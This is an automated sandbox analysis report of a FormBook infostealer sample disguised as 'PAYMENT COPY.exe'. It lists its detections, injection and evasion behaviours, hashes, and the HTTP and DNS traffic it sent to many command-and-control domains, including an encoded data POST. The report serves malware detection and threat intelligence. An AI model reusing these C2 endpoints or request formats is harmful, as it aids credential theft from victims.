Windows Analysis Report
PAYMENT COPY.exe

Overview

General Information

Sample name:	PAYMENT COPY.exe
Analysis ID:	1447913
MD5:	a05649b0d742e857fc002ac0b7759512
SHA1:	84051af6ed4aec8f1209d5f7ead77f20b8bffc2b
SHA256:	94ad0e1f81c61142471ffd1cbc66caf209d43aa514702033728a51e672702d6c
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: PAYMENT COPY.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.skinut-ves.ru/pf45/?VlEHDVvh=+FYLzbf4tuJqmfBE/IGOfF0r+MHgP4o87eLDAHdmTpq2bw1UrUMWUoU66GOKJ7n5AfomTNLEJ4yDFS4nbynVDFN+PHUTvroy3xH/fpiwWIz3Kb5ThfITUHU=&BHPD=o2nt	Avira URL Cloud: Label: malware
Source: http://www.drdavidglassman.com/rydx/?VlEHDVvh=yFQmHiiKcR7mSVWuRw8RQpo4LJVZTLcWi6hJF+Rn4pNF9HaZnauVsiHAA7JcJP010hHBzc/zc7n9tAOpAjixnZqk0gAODdt0gSRPUe/o9m+q8oWrf5RESRg=&BHPD=o2nt	Avira URL Cloud: Label: malware
Source: http://www.drdavidglassman.com/rydx/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe

Avira: detection malicious, Label: TR/Kryptik.amknq

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe

ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: PAYMENT COPY.exe	ReversingLabs: Detection: 91%
Source: PAYMENT COPY.exe	Virustotal: Detection: 41%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.PAYMENT COPY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2720133115.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2683419867.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2681925571.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947433222.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4947527933.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4945233762.0000000000860000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.4950914597.0000000004B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4947440762.00000000038F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2693537952.0000000002CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4954573044.0000000005CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2726398556.00000000033E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PAYMENT COPY.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: PAYMENT COPY.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PAYMENT COPY.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: gprslt.pdb source: PAYMENT COPY.exe, 00000009.00000002.2682700316.0000000001037000.00000004.00000020.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946217821.0000000000758000.00000004.00000020.00020000.00000000.sdmp, bQrgcvrrXfGN.exe, 00000010.00000002.2716953032.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946708771.0000000000C5E000.00000002.00000001.01000000.0000000D.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000000.2758464507.0000000000C5E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: PAYMENT COPY.exe, 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2681627538.0000000004536000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2685430118.00000000046E5000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2711206320.0000000004B38000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2709187681.0000000004989000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004E7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: PAYMENT COPY.exe, PAYMENT COPY.exe, 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, gpresult.exe, 0000000D.00000002.4947804085.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4947804085.0000000004890000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2681627538.0000000004536000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 0000000D.00000003.2685430118.00000000046E5000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2711206320.0000000004B38000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000003.2709187681.0000000004989000.00000004.00000020.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004CE0000.00000040.00001000.00020000.00000000.sdmp, gpresult.exe, 00000011.00000002.2720476799.0000000004E7E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: gprslt.pdbGCTL source: PAYMENT COPY.exe, 00000009.00000002.2682700316.0000000001037000.00000004.00000020.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 0000000C.00000002.4946217821.0000000000758000.00000004.00000020.00020000.00000000.sdmp, bQrgcvrrXfGN.exe, 00000010.00000002.2716953032.0000000000D08000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\gpresult.exe

Code function: 13_2_0087C050 FindFirstFileW,FindNextFileW,FindClose,

13_2_0087C050

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\PAYMENT COPY.exe	Code function: 4x nop then jmp 06DB9778h	0_2_06DB981C
Source: C:\Users\user\AppData\Roaming\bQrgcvrrXfGN.exe	Code function: 4x nop then jmp 07078A30h	10_2_07078AD4
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 4x nop then xor eax, eax	13_2_00869760
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 4x nop then pop edi	13_2_0086E380
Source: C:\Windows\SysWOW64\gpresult.exe	Code function: 4x nop then pop edi	13_2_0086E350

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 136.143.186.12 136.143.186.12

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /pf45/?VlEHDVvh=+FYLzbf4tuJqmfBE/IGOfF0r+MHgP4o87eLDAHdmTpq2bw1UrUMWUoU66GOKJ7n5AfomTNLEJ4yDFS4nbynVDFN+PHUTvroy3xH/fpiwWIz3Kb5ThfITUHU=&BHPD=o2nt HTTP/1.1Host: www.skinut-ves.ruAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /jaeg/?VlEHDVvh=9Opn4WO2xZgxxNDkNGsIia6GoKuxBfXh3HU6nJUJOovQ2Daq2EsR8T6osHZN6Oos26YiOKjRaUape58pdui5fF9pfPUX5VWYS5msIkgnGD14mtGY1feIQ7U=&BHPD=o2nt HTTP/1.1Host: www.mediciconstanta.roAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /y8lu/?VlEHDVvh=mWlJviWR5LwtuCLZCQRXGA+vQb38eHFgRBz6unIHe4HBIxzvdSvdhO03jK4wsowAz3gHYbTW35gnt1fPF07v4JZ2cMipkMMw/S8lqxq9gNP1PGwmWBqthC4=&BHPD=o2nt HTTP/1.1Host: www.celluslim.com.brAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /9i8t/?VlEHDVvh=2T5+pGPdigXxZZx8gY/OSLODLjvvwj0MjlV7S+1Ldbgia1Gm71jO+3C1ccfYbIwVvCUgnk/aeboESokRLTli2QWqQswZxn4Hxw0zC18njeajG3czp+Bsx3U=&BHPD=o2nt HTTP/1.1Host: www.supermontage.comAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /ni9v/?VlEHDVvh=1qDi8Q0JYC/+jowmm6vhnz1nUg+FzSnwkBEF+9sZfgdAuqPr9wV9FjKgoqnVlqm9IHxz/wQEEdcJ3vr/ooFd412OQCGzSxMe6/jXu+QS8SjFcrOZORUu8fo=&BHPD=o2nt HTTP/1.1Host: www.spotgush.topAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /rydx/?VlEHDVvh=yFQmHiiKcR7mSVWuRw8RQpo4LJVZTLcWi6hJF+Rn4pNF9HaZnauVsiHAA7JcJP010hHBzc/zc7n9tAOpAjixnZqk0gAODdt0gSRPUe/o9m+q8oWrf5RESRg=&BHPD=o2nt HTTP/1.1Host: www.drdavidglassman.comAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /uyud/?VlEHDVvh=a4DuWa1aWcmJH21/SNxRR+JRQb1v/kzaj3WKu4zLUxUUlKGTu9D1sWAogGI9gEZiY1gr5T6O35XBnrIr/I/ZCy9af/SljyarCQCdkJfuLPpdjFvVaxfdqpU=&BHPD=o2nt HTTP/1.1Host: www.topscaleservices.comAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /w8kk/?VlEHDVvh=xApCedPshlFqhM+jKZfmvnpl71z0cBQVdhsyYTPYXO8jvxnjhAjWxt0ri1XYL1kB/lDsxIYle23q9eZueg3dcjYKciZZWPOZx8TMcQAQa9bvKBBzdKnYGI4=&BHPD=o2nt HTTP/1.1Host: www.pinpointopia.comAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /spev/?VlEHDVvh=tbEztHv7aRBF16/vS4ReUtdihzrMDj2O7MCPG/vC1Jml0QkKRnSSU8sUdUNE92nxSgZvf0qXlo0KJW6hnlqWydczzuvw5M1cQ8Ki08JizjbM/1/wqRnw39c=&BHPD=o2nt HTTP/1.1Host: www.shy-models.ruAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /ru1k/?VlEHDVvh=Vfi8NJeG6CY6n5nCPnJqd7XWKv+ZgyRabuT1vrpiYigRQGH5yz+Kvpg97XvPM12AhWFNxFGVyTc+AfyoC76cxpbyACR6Ik9/1bVLBVzltJlAlJSXh5ctyy4=&BHPD=o2nt HTTP/1.1Host: www.chooceseafood.caAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /s5gg/?VlEHDVvh=Lex3y3SP4nMuJeMgNnltykKJrtse07Leq1Ynk5nBUbN+LWWMQkpVzy+EMOTic1Ks5WEW61I3b9noLb4lZz3/VBahdTtzKpjYDK5Fm2hl+YH8rBOlCQe91Nk=&BHPD=o2nt HTTP/1.1Host: www.knockdubai.aeAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /oqq6/?VlEHDVvh=rwgwPlALEUzYU2aVnuvDPIeIRMF/prMxeEAjcX/DBUkDQJY+y8rHCEXmR7eGsa/wgYTHR39WGVXgcrNwnNHcmkfubB89b8ls2WhHljXtxKg/z1p/kKzkfHY=&BHPD=o2nt HTTP/1.1Host: www.arsenjev.funAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /5xhc/?VlEHDVvh=MlmeOAVABHl7V7JWE669wIJbTLHKaUkhN9NjdS3PgsP7eMcTlCivolpOMqUU2YL5bEhebrvuWwjxxfDDk/ZIeLQ1wF+hSOQ+omIdi18JN7A0f8vC6TD737s=&BHPD=o2nt HTTP/1.1Host: www.embrace-counselor.comAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Source: global traffic	HTTP traffic detected: GET /9bwj/?VlEHDVvh=+7XJqbUQcguxa/KcUhsZdHSIPDv12M145Gf+kZkuNm6BJEH5M4YG3TEKS2nGgF42YhScJBjRA7U3xzFEvpUC1m9E0lF3kGvEoHdRMqPZgXJQjJurfTYwuhc=&BHPD=o2nt HTTP/1.1Host: www.drednents.esAccept: /Accept-Language: en-US,enConnection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)

Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: gpresult.exe, 0000000D.00000002.4949275030.00000000060C6000.00000004.10000000.00040000.00000000.sdmp, gpresult.exe, 0000000D.00000002.4951865323.00000000076E0000.00000004.00000800.00020000.00000000.sdmp, JBOkmqufMEGwlAXNwkIjNoQeH.exe, 00000013.00000002.4948809804.00000000038F6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.skinut-ves.ru
Source: global traffic	DNS traffic detected: DNS query: www.digishieldu.online
Source: global traffic	DNS traffic detected: DNS query: www.mediciconstanta.ro
Source: global traffic	DNS traffic detected: DNS query: www.onitango-test.com
Source: global traffic	DNS traffic detected: DNS query: www.celluslim.com.br
Source: global traffic	DNS traffic detected: DNS query: www.supermontage.com
Source: global traffic	DNS traffic detected: DNS query: www.spotgush.top
Source: global traffic	DNS traffic detected: DNS query: www.drdavidglassman.com
Source: global traffic	DNS traffic detected: DNS query: www.topscaleservices.com
Source: global traffic	DNS traffic detected: DNS query: www.pinpointopia.com
Source: global traffic	DNS traffic detected: DNS query: www.shy-models.ru
Source: global traffic	DNS traffic detected: DNS query: www.chooceseafood.ca
Source: global traffic	DNS traffic detected: DNS query: www.knockdubai.ae
Source: global traffic	DNS traffic detected: DNS query: www.arsenjev.fun
Source: global traffic	DNS traffic detected: DNS query: www.embrace-counselor.com
Source: global traffic	DNS traffic detected: DNS query: www.drednents.es

Source: unknown

HTTP traffic detected: POST /jaeg/ HTTP/1.1Host: www.mediciconstanta.roAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enOrigin: http://www.mediciconstanta.roCache-Control: no-cacheConnection: closeContent-Length: 205Content-Type: application/x-www-form-urlencodedReferer: http://www.mediciconstanta.ro/jaeg/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit (KHTML, like Gecko) Mobile (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)Data Raw: 56 6c 45 48 44 56 76 68 3d 77 4d 42 48 37 69 6a 6c 35 4d 55 32 38 2b 76 75 66 58 77 47 6a 37 43 61 6d 6f 2b 34 4c 2f 75 74 33 51 55 51 73 35 38 4a 62 39 44 6e 2f 53 57 37 38 32 63 7a 39 6a 4f 59 33 55 5a 67 2b 74 38 6f 34 2f 51 51 48 71 66 67 50 55 69 32 54 59 6f 45 62 2b 36 37 58 77 77 70 48 39 41 53 6c 45 72 72 61 37 6d 69 43 31 63 48 46 78 67 4c 6d 64 79 61 7a 63 47 65 52 61 33 6d 68 72 67 41 4b 52 51 70 53 55 70 6a 6c 6c 6b 74 43 77 6b 62 77 2f 38 49 37 4c 4f 2b 32 6d 75 4e 61 62 50 66 37 46 63 77 4f 35 79 4c 6e 57 74 69 64 43 6d 37 59 38 49 49 56 4b 76 4a 7a 73 70 39 6e 30 55 54 6f 77 65 46 45 51 3d 3d Data Ascii: VlEHDVvh=wMBH7ijl5MU28+vufXwGj7Camo+4L/ut3QUQs58Jb9Dn/SW782cz9jOY3UZg+t8o4/QQHqfgPUi2TYoEb+67XwwpH9ASlErra7miC1cHFxgLmdyazcGeRa3mhrgAKRQpSUpjllktCwkbw/8I7LO+2muNabPf7FcwO5yLnWtidCm7Y8IIVKvJzsp9n0UToweFEQ==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 27 May 2024 10:20:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 66 65 62 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 35 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 21 2a 5c 0a 20 20 21 2a 2a 2a 20 63 73 73 20 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 63 73 73 2d 6c 6f 61 64 65 72 2f 69 6e 64 65 78 2e 6a 73 3f 3f 63 6c 6f 6e 65 64 52 75 6c 65 53 65 74 2d 36 2e 75 73 65 5b 31 5d 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 70 6f 73 74 63 73 73 2d 6c 6f 61 64 65 72 2f 73 72 63 2f 69 6e 64 65 78 2e 6a 73 21 2e 2f 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 2f 6c 65 73 73 2d 6c 6f 61 64 65 72 2f 64 69 73 74 2f 63 6a 73 2e 6a 73 21 2e 2f 62 65 6d 2f 